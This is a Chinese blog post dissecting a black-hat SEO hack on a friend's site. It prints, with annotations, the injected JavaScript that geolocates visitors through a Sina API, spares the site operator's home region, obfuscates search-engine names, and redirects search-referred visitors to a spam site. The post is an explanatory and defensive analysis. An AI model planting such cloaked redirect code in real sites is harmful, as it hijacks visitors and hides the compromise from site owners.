标签:初步 情况 rip amp 当事人 nts script 服务器安全 elements
朋友网站被黑了,但是不是低级黑,虽然最后发现原理很简单,但是对于普通seo来说还是有些奇妙哦。而且不影响收录和排名,站长只管优化,黒帽偷偷得利!
情况是在百度打开收录的页面,打开后,会跳到别人的垃圾广告网站。
直接打开,或者在网站运营地区打开就是正常访问。
这波操作让当事人懵逼啊,只能靠客户反映。
我得知此事后初步判断是被植入了恶意代码加了判断。
在v站请教了大佬们后,得到了证实,还帮我找到了植入点,真是给力啊。
这是通过引入js来实现的。
下面我们来剖析下这技术简单但是微妙的操作吧。
当然这只是黒帽seo的冰山一角啦
(function() { var JSONP=document.createElement("script"); JSONP.type="text/javascript"; JSONP.src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"; 这里还用了新浪的api来判断城市 document.getElementsByTagName("head")[0].appendChild(JSONP); JSONP.onload = function() { var provinces = [‘\u5c71\u4e1c‘]; 山东、说明是不想让山东的运营发现 var provinces1 = [‘\u6ed5\u5dde‘]; 滕州 for(var i in provinces) { if(remote_ip_info.province != provinces[i] && remote_ip_info.city != provinces1[i]) { remote_ip_info这个是从新浪api得到的 excute(); 如果不是运营地区就跳广告 } } } function excute() { 广告函数 var ref=document.referrer; // referrer 方法用来判断上一个网页的url,没有返回null var ba="ba"; // 这个操作估计是为了不让搜索引擎发现吧 ba = ba + "idu"; var so="so"; so = so + "gou"; var s="s"; s = s + "o"; var go="go"; go = s + "m"; nam = ""; if(ref.indexOf(ba)>0||ref.indexOf(so)>0||ref.indexOf(s)>0||ref.indexOf(go)>0) 判断是不是搜索引擎过来的 { window.location.href="http://垃圾网站。com"; 跳垃圾网站 } } })()
但是这种问题都是因为服务器安全不到位,被黑客获取权限,实施了恶意植入。
所以网站安全是非常主要的。
发现一波黒帽seo神操作,通过百度打开跳广告,其他方式访问正常。下面分析原理。
标签:初步 情况 rip amp 当事人 nts script 服务器安全 elements
原文地址:http://www.cnblogs.com/norie/p/7889095.html